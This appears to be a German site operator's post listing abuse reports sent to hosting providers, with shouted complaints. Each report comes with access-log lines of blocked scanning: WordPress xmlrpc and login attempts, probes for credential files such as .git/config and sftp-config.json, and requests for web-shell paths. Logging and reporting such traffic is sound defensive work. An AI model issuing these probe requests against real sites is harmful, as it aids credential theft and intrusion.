130.195.241.7 website*x.com – – [21/Jul/2025:02:06:18 +0200] „GET /cms/wp-includes/wlwmanifest.xml HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36“
+
AS9009 – M247 Europe SRL – STOP THIS REFERRER-SPAM NOW!!!
abuse@m247.ro
141.98.103.162 website*x.com – – [21/Jul/2025:10:13:00 +0200] „GET / HTTP/1.0“ 403 – „https://ithouse.pro/“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000“
141.98.103.162 website*x.com – – [21/Jul/2025:10:13:00 +0200] „GET / HTTP/1.0“ 403 – „https://ithouse.pro/“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000“
141.98.103.162 website*x.com – – [21/Jul/2025:10:13:00 +0200] „GET / HTTP/1.0“ 403 – „https://ithouse.pro/“ „Mozilla/4.0 (compatible; MSIE 6.0; Windows NT) ::ELNSB50::000061100320025802a00111000000000507000900000000“
AS51167 – Contabo GmbH – CONTABO AGAIN AND AGAIN! NO ANSWER, NO INFO! VERY IGNORANT AND VERY UNSECURE!!!
abuse@contabo.de
167.86.74.247 website*x.com – – [21/Jul/2025:06:32:56 +0200] „GET /wp-login.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36“
167.86.74.247 website*x.com – – [21/Jul/2025:06:32:56 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „https://t.co/“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 13_6_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15“

–

MAIL NR. 24 TODAY!
abuse-team@tier.net,netops@tier.net,admin@frantech.ca,abuse.de@telefonica.com
AS53667 – FranTech Solutions – AGAIN AND AGAIN – STOP THIS HACKER-IDIOTS IN YOUR NETWORKS NOW!!!
admin@frantech.ca
45.61.184.222 website*x.com – – [21/Jul/2025:10:58:48 +0200] „POST /wp-json/sure-triggers/v1/automation/action HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36“
AS6805 – Telefonica Germany GmbH & Co.OHG AGAIN AND AGAIN – STOP THIS HACKER-IDIOTS IN YOUR NETWORKS NOW!!!
abuse.de@telefonica.com
92.226.2.70 website*x.com – – [21/Jul/2025:12:07:24 +0200] „GET /static2.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36“
AS397423 – Tier.Net Technologies LLC
abuse-team@tier.net
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:34 +0200] „GET /.well-known/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:34 +0200] „GET /.well-known/pki-validation/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:34 +0200] „GET /.well-known/acme-challenge/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:34 +0200] „GET /vendor/phpunit/phpunit/src/Util/PHP/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:35 +0200] „GET /wp-content/uploads/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:35 +0200] „GET /wp-content/themes/tflow/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:35 +0200] „GET /wp-admin/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.105 Safari/537.36 OPR/70.0.3728.95“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:35 +0200] „GET /wordpress/wp-admin/includes HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:35 +0200] „GET /wp-admin/js/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.125 Safari/537.36“
147.124.195.73 website*x.com – – [21/Jul/2025:13:39:36 +0200] „GET /ALFA_DATA/ HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
… and so on…!

–

MAIL NR. 25 TODAY!
abuse@as210558.net,abuse@2cloud.eu
AS210558 – 1337 Services GmbH – VERY IGNORANT AND UNSECURE PROVIDER – DAILY THE SAME HACKING-ATTEMPTS! – NO ANSWER!
abuse@as210558.net
45.141.215.30 website*x.de – – [19/Jul/2025:11:43:22 +0200] „GET /wp-admin/install.php?step=1 HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.75.14 (KHTML, like Gecko) Version/7.0.3 Safari/7046A194A“
AS39845 – 2 Cloud Ltd. – HERE WITH REFERRER-SPAM TO schott-autoteile.eu!!!
abuse@2cloud.eu
185.176.220.76 website*x.de – – [19/Jul/2025:12:41:28 +0200] „GET / HTTP/1.0“ 403 – „http://schott-autoteile.eu“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36“

–

MAIL NR. 26 TODAY!
abuse@iana.org,abuse@ntup.net,abuse@chinamobile.com
IANA – Internet Assigned Numbers Authority
abuse@iana.org
2002:9df5:9f75::9df5:9f75 website*x.com – – [21/Jul/2025:15:15:46 +0200] „GET /wp-includes/wlwmanifest.xml HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
2002:9df5:9f75::9df5:9f75 website*x.com – – [21/Jul/2025:15:16:05 +0200] „GET /administrator/index.php HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
2002:9df5:9f75::9df5:9f75 website*x.com – – [21/Jul/2025:15:16:15 +0200] „GET /view-source: HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
2002:9df5:9f75::9df5:9f75 website*x.com – – [21/Jul/2025:15:16:34 +0200] „GET /misc/ajax.js HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
AS48693 – Rices Privately owned enterprise – VERY IGNORANT – VERY UNSECURE – NO ANSWER ABOUT ABUSE-MAILS SINCE MONTHS!
abuse@ntup.net
194.145.227.125 website*x.com – – [21/Jul/2025:13:07:51 +0200] „GET /joobi/inc/openflashchart/php-ofc-library/ofc_upload_image.php HTTP/1.0“ 403 – „-“ „ALittle Client“
AS9808 – China Mobile – CHINA IS VERY UNWANTED AND COMPLETE BLOCKED WITH OUR SECURITY-TOOL AT MANY WEBSITES!!!
STUPID REFERRER-SPAM HERE!
abuse@chinamobile.com
2409:8a34:407f:7d20:a00:27ff:fe40:545a website*x.com – – [21/Jul/2025:13:53:44 +0200] „GET / HTTP/1.0“ 403 – „http://www.encmbtia.online/“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36“

–

MAIL NR. 27 TODAY!
abuse@nl.leaseweb.com,abuse@iana.org,google-cloud-compliance@google.com, network-abuse@google.com
AS60781 – LeaseWeb Netherlands B.V.
abuse@nl.leaseweb.com
95.168.173.5 website*x.de – – [21/Jul/2025:08:38:21 +0200] „GET /pinfo.php HTTP/1.0“ 302 20 „-“ „python-requests/2.32.4“
95.168.173.5 website*x.de – – [21/Jul/2025:08:38:21 +0200] „GET /info.php HTTP/1.0“ 302 20 „-“ „python-requests/2.32.4“
95.168.173.5 website*x.de – – [21/Jul/2025:08:38:21 +0200] „GET /test.php HTTP/1.0“ 302 20 „-“ „python-requests/2.32.4“
95.168.173.5 website*x.de – – [21/Jul/2025:08:38:21 +0200] „GET /phpinfo.php HTTP/1.0“ 302 20 „-“ „python-requests/2.32.4“
IANA – Internet Assigned Numbers Authority
abuse@iana.org
2002:9df5:9f75::9df5:9f75 website*x.de – – [21/Jul/2025:14:49:08 +0200] „GET /administrator/index.php HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
2002:9df5:9f75::9df5:9f75 website*x.de – – [21/Jul/2025:14:49:23 +0200] „GET /view-source: HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
2002:9df5:9f75::9df5:9f75 website*x.de – – [21/Jul/2025:14:49:43 +0200] „GET /misc/ajax.js HTTP/1.0“ 403 – „-“ „python-requests/2.27.1“
AS396982 – Google LLC – ALSO GOOGLE AGAIN AND AGAIN! VERY UNSECURE NETWORKS!!!
google-cloud-compliance@google.com
34.169.112.254 website*x.de – – [21/Jul/2025:15:41:32 +0200] „GET /media/system/js/core.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“
34.169.112.254 website*x.de – – [21/Jul/2025:15:41:32 +0200] „GET /wp-includes/js/jquery/jquery.js HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36“

Nach all diesen Meldungen sind die Hacking-Versuche massiv zurückgegangen, haha! Die Hacker-Idioten sollten sich so langsam ganz genau überlegen, was sie tun und es am besten GANZ LASSEN!

Ansonsten haben diese oft sehr dummen SCRIPT-KIDDIES bald kaum noch SPIELZEUG!

Protokoll vom 14.07.25 bis heute Mittag!

Protokoll vom Wochenende ist weiter unten!

Wir werden diesen Hacker-Idioten und absolut dummen Script-Kiddies vom Wochenende IHR SPIELZEUG nach und nach wegnehmen!

Bis heute Mittag sind nochmal über 10 Abuse-Mails raus! Immer an 2 bis 4 Empfänger gleichzeitig. Haha, so sieht auch die Konkurrenz, wie UNSICHER die WEBSPACES, SERVER und NETZWERKE der Konkurrenz ist!

Hier die Liste der Abuse-Meldungen von heute Morgen:

hostmaster@nic.ad.jp – VERY IGNORANT PROVIDER – NO ANSWER, NO INFO!
160.251.96.90 website*x.com – – [14/Jul/2025:10:24:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@digitalocean.com – HERE WITH 2 IP´S!
165.227.84.186 website*x.com – – [14/Jul/2025:11:30:03 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
68.183.106.79 website*x.com – – [14/Jul/2025:11:51:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

info@smartlink-isp.com – VERY IGNORANT PROVIDER – NO ANSWER, NO INFO!
45.157.54.24 www.website*x.de – – [14/Jul/2025:10:30:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.24 www.website*x.de – – [14/Jul/2025:11:10:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

abuse@myloc.de
89.163.242.76 website*x.com – – [14/Jul/2025:10:08:13 +0200] „GET /gdftps.php HTTP/1.0“ 302 20 „www.google.com“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

anush@advinservers.com
2602:fb54:cc2:: website*x.com – – [14/Jul/2025:10:12:51 +0200] „GET /ioxi-o.php HTTP/1.0“ 302 20 „-“ „Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36“

abuse@contabo.de
81.0.219.251 website*x.com – – [14/Jul/2025:08:49:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 20 „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@ovh.net
2001:41d0:203:b338:: website*x.com – – [14/Jul/2025:10:32:43 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@digitalocean.com – HERE WITH 2 IP´S!
2a03:b0c0:1:e0::550:4001 website*x.com – – [14/Jul/2025:10:59:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
+
167.71.222.191 website*x.com – – [14/Jul/2025:09:13:22 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@vmbox.cloud
185.153.199.135 website*x.com – – [14/Jul/2025:10:42:52 +0200] „GET /js/elfinder/php/connector.php HTTP/1.0“ 403 – „-“ „ALittle Client“

abuse@proximus.com
2a02:a03f:e5bc:ba00:a5b8:4875:184e:e4c3 website*x.com – – [14/Jul/2025:10:59:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

abuse@kusuma.net.id
103.42.117.165 website*x.com – – [14/Jul/2025:11:22:10 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@amazonaws.com
2600:1f16:49a:9100:e737:8dcf:4962:9c0c website*x.com – – [14/Jul/2025:12:03:29 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@ovh.net
2001:41d0:336:ce00:: website*x.com – – [14/Jul/2025:07:14:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

support@appletec.ru – RUSSIA IS COMPLETE UNWANTED AND COMPLETE BLOCKED!
193.164.17.45 website*x.com – – [14/Jul/2025:08:04:28 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@digitalocean.com
157.245.131.229 website*x.com – – [14/Jul/2025:08:42:52 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@horizoniq.com
173.236.127.48 website*x.com – – [14/Jul/2025:09:40:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@namecheaphosting.com
159.198.79.246 website*x.com – – [14/Jul/2025:07:20:21 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

domain-abuse@dreamhost.com
75.119.221.53 website*x.com – – [14/Jul/2025:07:40:44 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

tencent_idc@tencent.com – TENCENT IS COMPLETE UNWANTED AND COMPLETE BLOCKED!
45.40.241.160 website*x.com – – [14/Jul/2025:08:23:45 +0200] „GET /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249 Safari/537.36“

isabel.paz@tigo.com.hn
190.242.26.213 website*x.com – – [14/Jul/2025:08:25:19 +0200] „GET /xmlrpc.php?rsd HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36“

info@smartlink-isp.com
45.157.54.24 website*x.com – – [14/Jul/2025:07:41:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“
45.157.54.24 website*x.com – – [14/Jul/2025:07:41:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36“

abuse@ovh.net – HERE WITH 2 IP´S!!!
92.222.181.205 website*x.com – – [14/Jul/2025:08:39:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
+
51.254.199.77 website*x.com – – [14/Jul/2025:10:20:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@vialis.net
85.95.216.149 website*x.com – – [14/Jul/2025:09:33:26 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

Protokoll ab 11.07.25 + Wochenende!

Wir werden diesen Hacker-Idioten und absolut dummen Script-Kiddies vom Wochenende IHR SPIELZEUG nach und nach wegnehmen!

Heute Morgen sind 42 Abuse-Mails raus! Immer an 2 bis 4 Empfänger gleichzeitig. Haha, so sieht auch die Konkurrenz, wie UNSICHER die WEBSPACES, SERVER und NETZWERKE der Konkurrenz ist!

Einige auch mit ZUSATZBEMERKUNG, wenn der Provider sehr IGNORANT oder sehr UNSICHER ist!

Hier die Liste, was heute morgen per ABUSE-MAIL raus ist, ein ABSATZ war immer eine Email an mehrere PROVIDER:

abuse@bell.ca
70.50.107.99 website*1.com – – [11/Jul/2025:15:28:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse.pt@vodafone.com
2001:818:ebf0:d100:530f:ba80:903:c585 website*1.com – – [11/Jul/2025:15:29:01 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
abuse@hosteurope.de
92.205.182.254 website*1.com – – [11/Jul/2025:18:11:46 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@jink.host
195.182.25.241 website*1.com – – [11/Jul/2025:14:44:10 +0200] „GET /.git/config HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux; i686; en-US; rv:1.6) Gecko Debian/1.6-7“

admin@idcloudhost.com
116.193.190.94 website*1.com – – [11/Jul/2025:19:02:56 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@scalahosting.com
209.142.66.4 website*1.com – – [11/Jul/2025:20:12:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@contabo.de
157.173.126.116 website*1.com – – [11/Jul/2025:21:59:47 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

domain-abuse@dreamhost.com
67.205.34.113 website*1.com – – [11/Jul/2025:22:48:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@arsys.es,abuse@ionos.com
82.223.0.222 website*1.com – – [12/Jul/2025:00:25:37 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
admin@scicube.com
103.11.101.122 website*1.com – – [12/Jul/2025:02:17:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@amazonaws.com, trustandsafety@support.aws.com
3.111.171.205 website*1.com – – [12/Jul/2025:03:10:18 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
eig-abuse@endurance.com,eig-noc@endurance.com
50.6.3.45 website*1.com – – [12/Jul/2025:05:49:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@godaddy.com
92.204.89.200 website*1.com – – [12/Jul/2025:07:30:49 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@sunrise.net
194.230.160.226 website*1.com – – [12/Jul/2025:08:17:15 +0200] „POST /xmlrpc.php HTTP/1.0“ 302 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
gayatricustomercare@gmail.com
103.70.155.83 website*1.com – – [12/Jul/2025:08:18:55 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“
hostmaster@telkomsel.co.id
2404:c0:5c10::751d:f53f website*1.com – – [12/Jul/2025:08:20:13 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36“

abuse-fr@eurofiber.com
185.75.143.243 website*1.com – – [12/Jul/2025:08:57:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; U; Linux i686; en-US; rv:96.0) Gecko/20071914 Firefox/96.0“
abuse@publicdomainregistry.com
43.225.54.44 website*1.com – – [12/Jul/2025:09:47:32 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
director_ejecutivo@ruav.edu.co
45.183.196.214 website*1.com – – [12/Jul/2025:10:32:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

abuse@ovh.net – HERE WITH 3 IP´S! VERY UNSECURE!!!
2001:41d0:304:200::d23b website*1.com – – [12/Jul/2025:11:30:40 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
2001:41d0:203:b338:: website*1.com – – [12/Jul/2025:23:09:12 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
2001:41d0:2:3ea5:: website*1.com – – [13/Jul/2025:00:03:00 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@oracleemaildelivery.com – HERE WITH 2 IP´S! VERY UNSECURE!!!
152.67.193.32 website*1.com – – [12/Jul/2025:12:22:02 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
51.254.199.77 website*1.com – – [12/Jul/2025:13:29:30 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuses@abelohost.net – HERE WITH 2 ATTEMPTS – VERY UNSECURE!!!
185.231.220.198 website*1.com – – [12/Jul/2025:15:47:38 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
185.231.220.198 website*1.com – – [12/Jul/2025:19:56:09 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

reportabuse@advancedserverdns.com
43.230.201.87 website*1.com – – [12/Jul/2025:16:56:51 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@vtx.ch
212.147.5.172 website*1.com – – [12/Jul/2025:18:25:17 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“
abuse@hostinger.com
2a02:4780:12:d924::1 website*1.com – – [12/Jul/2025:19:17:07 +0200] „POST /xmlrpc.php HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/91.0“

noc.mltl@gmail.com
103.120.223.44 www. website*2.de – – [12/Jul/2025:04:20:31 +0200] „GET /.ftpconfig HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36“
abuse@sriwijayahost.co.id – HERE WITH 2 ATTEMPTS!
157.66.56.183 website*2.de – – [12/Jul/2025:08:41:48 +0200] „GET /sftp-config.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
157.66.56.183 website*2.de – – [12/Jul/2025:08:41:50 +0200] „GET /.vscode/sftp.json HTTP/1.0“ 403 – „-“ „Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0“
abuse@microsoft.com – VERY UNSAFE PROVIDER! VERY MUCH HACKING-ATTEMPTS EVERY DAY!
52.169.251.137 website*2.de – – [13/Jul/2025:05:38:03 +0200] „GET /wp-content/uploads/wpr-addons/forms/b1ack.php HTTP/1.0“ 403 – „-“ „-“
52.169.251.137 website*2.de – – [13/Jul/2025:05:38:03 +0200] „GET /wp-content/plugins/fix/up.php HTTP/1.0“ 403 – „-“ „-“
52.169.251.137 website*2.de – – [13/Jul/2025:05:38:03 +0200] „GET /wp-content/themes/twentyfive/include.php HTTP/1.0“ 403 – „-“ „-“
